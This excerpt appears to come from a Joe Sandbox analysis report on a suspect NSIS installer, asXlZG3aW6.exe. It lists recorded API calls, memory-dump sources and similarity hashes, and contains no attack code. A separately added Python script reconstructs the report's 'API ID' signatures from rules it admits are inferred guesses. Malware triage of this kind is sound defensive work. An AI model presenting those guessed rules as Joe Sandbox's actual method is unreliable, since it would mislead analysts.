                                                                                                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 0040423D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040425E
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004042E4
                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 004042E7
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404312
                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00404361
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040436A
                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00404380
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404383
                                                                                                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
                                                                                                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: :A@$Call$N
                                                                                                                                                                                    • API String ID: 3103080414-988963664
                                                                                                                                                                                    • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextA.USER32(00000000,benevolently Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$benevolently Setup
• API String ID: 941294808-4072580303
• Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
• Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
• Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
• Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
• GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
• GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
• wsprintfA.USER32 ref: 00405C49
• GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
• SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
• GlobalFree.KERNEL32(00000000), ref: 00405D32
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\asXlZG3aW6.exe,80000000,00000003), ref: 00405B02
  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %s=%s$[Rename]
• API String ID: 2171350718-1727408572
• Opcode ID: f2ec23aa19f738889096a3ad1bd3946321de2aef01a06aa8690d73ef80469bf6
• Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
• Opcode Fuzzy Hash: f2ec23aa19f738889096a3ad1bd3946321de2aef01a06aa8690d73ef80469bf6
• Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
• CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
• CharNextA.USER32(?,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
• CharPrevA.USER32(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
Strings
• *?|<>/":, xrefs: 00406217
• "C:\Users\user\Desktop\asXlZG3aW6.exe", xrefs: 0040620B
• C:\Users\user\AppData\Local\Temp\, xrefs: 004061D0
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\asXlZG3aW6.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-966308650
• Opcode ID: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
• Instruction ID: ed3a47555f86895cac8e455d85beb05a749fa7fcd8deb799c497f9efd275ca90
• Opcode Fuzzy Hash: 5f1665aab2a45dc98a0c2aad5c019af140aadccb050e4449eaa375ca2787231f
• Instruction Fuzzy Hash: D111E26180579029FB3226380C44B776F884F6A760F1900BFE8D2722C3CA7C5C62966E
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 004040AA
• GetSysColor.USER32(00000000), ref: 004040C6
• SetTextColor.GDI32(?,00000000), ref: 004040D2
• SetBkMode.GDI32(?,?), ref: 004040DE
• GetSysColor.USER32(?), ref: 004040F1
• SetBkColor.GDI32(?,?), ref: 00404101
• DeleteObject.GDI32(?), ref: 0040411B
• CreateBrushIndirect.GDI32(?), ref: 00404125
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
• Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
• Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
• Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalFree.KERNEL32(?), ref: 100024B3
• GlobalFree.KERNEL32(00000000), ref: 100024ED
Memory Dump Source
• Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
• Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
• Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
• Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
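Every entry in this section carries an "API ID" under "Similarity", a token signature built from the function's imported API calls that lets the sandbox match functions across samples regardless of addresses or fuzzy-hash drift. The following script is an added example, not Joe Sandbox code, that rebuilds the four API IDs shown in the entries above (the [Rename] file routine, the CharNext/CharPrev path scanner, the GetSysColor/CreateBrushIndirect control-colour handler and the GlobalAlloc/GlobalFree plugin routine) from their "APIs" bullets. The rules it applies are inferred from those four entries and are assumptions, not a published specification: split each API name on CamelCase boundaries, drop one-letter tokens (the A/W suffix) and the prefix tokens Get, Set, Sys and Bk, count tokens over every listed call including "Part of subcall" lines, group tokens by count with the highest first, sort each group, and join the groups with "$". The embedded bullet text is copied from the entries above with argument lists shortened.

```python
"""Rebuild the per-function 'API ID' signature shown in this report section.

Added example, not Joe Sandbox code. The derivation rules are inferred
from the four complete entries above and are assumptions.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict

# Assumed stop-tokens: prefixes that never appear in the signatures above.
STOP_TOKENS = {"Get", "Set", "Sys", "Bk"}

# One '• Name.MODULE(...)' bullet, with or without the 'Part of subcall' prefix.
API_LINE = re.compile(
    r"•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?(\w+)\.(\w+)"
)


def tokenize(api_name: str) -> list[str]:
    """'GetShortPathNameA' -> ['Short', 'Path', 'Name']; 'lstrlenA' -> ['lstrlen']."""
    parts = re.findall(r"[a-z]+|[A-Z][a-z]*", api_name)
    return [p for p in parts if len(p) > 1 and p not in STOP_TOKENS]


def api_calls(entry: str) -> list[str]:
    """Return the API names, in order and with repeats, from an entry's 'APIs' bullets."""
    names = []
    for line in entry.splitlines():
        m = API_LINE.match(line.strip())
        if m:
            names.append(m.group(1))
    return names


def api_id(api_names: list[str]) -> str:
    """Token signature: groups ordered by call count (highest first), '$'-separated."""
    counts = Counter(tok for name in api_names for tok in tokenize(name))
    groups: dict[int, list[str]] = defaultdict(list)
    for tok, n in counts.items():
        groups[n].append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# 'APIs' bullets copied from the four entries above (argument lists shortened).
ENTRIES = {
    "rename": """
• CloseHandle.KERNEL32(00000000,?,00000000,00000001), ref: 00405C05
• GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000), ref: 00405A73
  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000), ref: 00405AA5
• GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
• wsprintfA.USER32 ref: 00405C49
• GetFileSize.KERNEL32(00000000,00000000,0042CA00), ref: 00405C84
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405C93
• lstrcpyA.KERNEL32(00000000,[Rename]), ref: 00405CCB
• SetFilePointer.KERNEL32(0040A3B8,00000000,00000000), ref: 00405D21
• GlobalFree.KERNEL32(00000000), ref: 00405D32
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003), ref: 00405B02
  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001), ref: 00405B24
""",
    "charnext": """
• CharNextA.USER32(?), ref: 00406227
• CharNextA.USER32(?), ref: 00406234
• CharNextA.USER32(?), ref: 00406239
• CharPrevA.USER32(?), ref: 00406249
""",
    "ctlcolor": """
• GetWindowLongA.USER32(?,000000EB), ref: 004040AA
• GetSysColor.USER32(00000000), ref: 004040C6
• SetTextColor.GDI32(?,00000000), ref: 004040D2
• SetBkMode.GDI32(?,?), ref: 004040DE
• GetSysColor.USER32(?), ref: 004040F1
• SetBkColor.GDI32(?,?), ref: 00404101
• DeleteObject.GDI32(?), ref: 0040411B
• CreateBrushIndirect.GDI32(?), ref: 00404125
""",
    "globalfree": """
  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040), ref: 1000121D
• GlobalFree.KERNEL32(?), ref: 100024B3
• GlobalFree.KERNEL32(00000000), ref: 100024ED
""",
}


def report_signatures() -> dict[str, str]:
    """API ID for each embedded entry; matches the 'API ID' lines in this section."""
    return {name: api_id(api_calls(text)) for name, text in ENTRIES.items()}


if __name__ == "__main__":
    for name, sig in report_signatures().items():
        print(f"{name}: {sig}")
```

Because the signature keys on the multiset of API name tokens rather than on bytes, the same NSIS stub function yields the same API ID in every sample built with that NSIS version, which is what makes the "Similarity" block useful for triage: an unfamiliar Opcode ID with a familiar API ID is usually a recompiled or relinked copy of known code, not new functionality. The stop-token set is the weakest assumption here; any prefix not exercised by these four entries may be handled differently by the real tool.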
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
• GetMessagePos.USER32 ref: 0040497A
• ScreenToClient.USER32(?,?), ref: 00404994
• SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                    • MulDiv.KERNEL32(00046D47,00000064,000476F0), ref: 00402CA7
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00402CB7
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402CB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002348
                                                                                                                                                                                      • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                                                                                                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100022FE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3730416702-0
                                                                                                                                                                                    • Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                    • Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                    • Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
